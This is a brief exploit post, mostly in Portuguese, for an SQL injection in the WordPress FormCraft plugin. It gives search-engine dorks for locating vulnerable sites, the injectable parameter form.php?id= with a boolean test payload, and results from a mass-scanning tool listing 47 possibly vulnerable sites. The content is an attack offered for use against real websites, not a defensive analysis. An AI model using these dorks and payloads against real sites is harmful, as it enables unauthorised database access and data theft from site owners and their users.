Wordpress formcraft Plugin Sql Injection
# Exploit Author : Ashiyane Digital Security Team
#
#DORK[0] inurl:/wp-content/plugins/formcraft
#DORK[1] inurl:/wp-content/plugins/formcraft/form.php?id=
#
# Testado: Windows , Linux
#################################################################################
# Tipo Exploit : Sql Injection
#
# Local: [alvo]/wp-content/plugins/formcraft/form.php?id=[Sql]
# Exploit-DB Note:
# Injeção de exploit: form.php?id=1%20and%20 1=1
# Exploit: http://www.exploit-db.com/exploits/30002/
#################################################################################
Usando o SCANNER INURL 1.0 - INTERFACE para capturar URL's com esse tipo de falha.
Down: https://code.google.com/p/scanner-inurl/
CONFIGURAÇÃO
RESULTADO
TOTAL DE URL's: 78
EXPLOIT USADO:
DORK: inurl:/wp-content/plugins/formcraft/form.php?id=
TIPO DE ERRO: PERSONALIZADO
PROCURAR ERRO:/plugins/formcraft/js/form.js?ver=
TOTAL DE POSSÍVEIS VULL: 47
ARQUIVO COM RESULTADO: resultados.txt
